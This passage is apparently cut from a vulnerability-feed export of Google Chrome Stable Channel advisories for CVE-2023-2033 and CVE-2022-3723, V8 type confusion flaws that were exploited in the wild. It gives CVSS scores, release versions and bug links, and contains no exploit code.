Please see the [Chrome Security Page](<https://sites.google.com/a/chromium.org/dev/Home/chromium-security>) for more information. \n\n\n[$NA][[1432210](<https://crbug.com/1432210>)] High CVE-2023-2033: Type Confusion in V8. Reported by Cl\u00e9ment Lecigne of Google's Threat Analysis Group on 2023-04-11 \n\n\nWe would also like to thank all security researchers that worked with us during the development cycle to prevent security bugs from ever reaching the stable channel. \n\n\nGoogle is aware that an exploit for CVE-2023-2033 exists in the wild. \n\n\nAs usual, our ongoing internal security work was responsible for a wide range of fixes: \n\n[[1433131](<https://crbug.com/1433131>)] Various fixes from internal audits, fuzzing and other initiatives \n\n\n\n\nMany of our security bugs are detected using [AddressSanitizer](<https://code.google.com/p/address-sanitizer/wiki/AddressSanitizer>), [MemorySanitizer](<https://code.google.com/p/memory-sanitizer/wiki/MemorySanitizer>), [UndefinedBehaviorSanitizer](<https://www.chromium.org/developers/testing/undefinedbehaviorsanitizer>), [Control Flow Integrity](<https://sites.google.com/a/chromium.org/dev/developers/testing/control-flow-integrity>), [libFuzzer](<https://sites.google.com/a/chromium.org/dev/developers/testing/libfuzzer>), or [AFL](<https://github.com/google/afl>). \n\n\n\n\n\n\n\n\n\nInterested in switching release channels? Find out how [here](<https://www.chromium.org/getting-involved/dev-channel>). If you find a new issue, please let us know by [filing a bug](<https://crbug.com/>). 
The [community help forum](<https://support.google.com/chrome/community>) is also a great place to reach out for help or learn about common issues.\n\nSrinivas Sista \n\n\nGoogle Chrome", "cvss3": {"cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}}, "published": "2023-04-14T00:00:00", "type": "chrome", "title": "Stable Channel Update for Desktop", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-2033"], "modified": "2023-04-14T00:00:00", "id": "GCSA-7014549802422661685", "href": "https://chromereleases.googleblog.com/2023/04/stable-channel-update-for-desktop_14.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-02T20:11:41", "description": "The Stable channel has been updated to 107.0.5304.87 for Mac and Linux and 107.0.5304.87/.88 for Windows, which will roll out over the coming days/weeks. A full list of changes in this build is available in the [log](<https://chromium.googlesource.com/chromium/src/+log/107.0.5304.62..107.0.5304.87?pretty=fuller&n=10000>). \n\n\n\n\n Security Fixes and Rewards\n\nNote: Access to bug details and links may be kept restricted until a majority of users are updated with a fix. 
We will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven't yet fixed.\n\n\n\n\nThis update includes [1](<https://bugs.chromium.org/p/chromium/issues/list?can=1&q=type%3Abug-security+os%3DAndroid%2Cios%2Clinux%2Cmac%2Cwindows%2Call%2Cchrome+label%3ARelease-1-M107>) security fix. Below, we highlight fixes that were contributed by external researchers. Please see the [Chrome Security Page](<https://sites.google.com/a/chromium.org/dev/Home/chromium-security>) for more information.\n\n\n\n\n[$TBD][[1378239](<https://crbug.com/1378239>)] High CVE-2022-3723: Type Confusion in V8. Reported by Jan Vojt\u011b\u0161ek, Mil\u00e1nek, and Przemek Gmerek of Avast on 2022-10-25\n\n\n\n\nWe would also like to thank all security researchers that worked with us during the development cycle to prevent security bugs from ever reaching the stable channel. \n\n\n\nGoogle is aware of reports that an exploit for CVE-2022-3723 exists in the wild.\n\nMany of our security bugs are detected using [AddressSanitizer](<https://code.google.com/p/address-sanitizer/wiki/AddressSanitizer>), [MemorySanitizer](<https://code.google.com/p/memory-sanitizer/wiki/MemorySanitizer>), [UndefinedBehaviorSanitizer](<https://www.chromium.org/developers/testing/undefinedbehaviorsanitizer>), [Control Flow Integrity](<https://sites.google.com/a/chromium.org/dev/developers/testing/control-flow-integrity>), [libFuzzer](<https://sites.google.com/a/chromium.org/dev/developers/testing/libfuzzer>), or [AFL](<https://github.com/google/afl>).\n\n\n\n\nInterested in switching release channels? Find out how [here](<https://www.chromium.org/getting-involved/dev-channel>). If you find a new issue, please let us know by [filing a bug](<https://crbug.com/>). 
The [community help forum](<https://support.google.com/chrome/community>) is also a great place to reach out for help or learn about common issues.\n\n\n\n\n\n\n\nPrudhvikumar Bommana \n\n\nGoogle Chrome", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-10-27T00:00:00", "type": "chrome", "title": "Stable Channel Update for Desktop", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-3723"], "modified": "2022-10-27T00:00:00", "id": "GCSA-272405271979539515", "href": "https://chromereleases.googleblog.com/2022/10/stable-channel-update-for-desktop_27.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-02T20:11:38", "description": "The Stable channel has been updated to 108.0.5359.94 for Mac and Linux and 108.0.5359.94/.95 for Windows, which will roll out over the coming days/weeks. 
A full list of changes in this build is available in the [log](<https://chromium.googlesource.com/chromium/src/+log/108.0.5359.71..108.0.5359.94?pretty=fuller&n=10000>).\n\n\n\n\nThe Extended Stable channel has been updated to 108.0.5359.94 for Windows and Mac which will roll out over the coming days/weeks. \n\n Security Fixes and Rewards\n\nNote: Access to bug details and links may be kept restricted until a majority of users are updated with a fix. We will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven't yet fixed.\n\n\n\n\nThis update includes [1](<https://bugs.chromium.org/p/chromium/issues/list?can=1&q=type%3Abug-security+os%3DAndroid%2Cios%2Clinux%2Cmac%2Cwindows%2Call%2Cchrome+label%3ARelease-1-M108>) security fix. Below, we highlight fixes that were contributed by external researchers. Please see the [Chrome Security Page](<https://sites.google.com/a/chromium.org/dev/Home/chromium-security>) for more information.\n\n\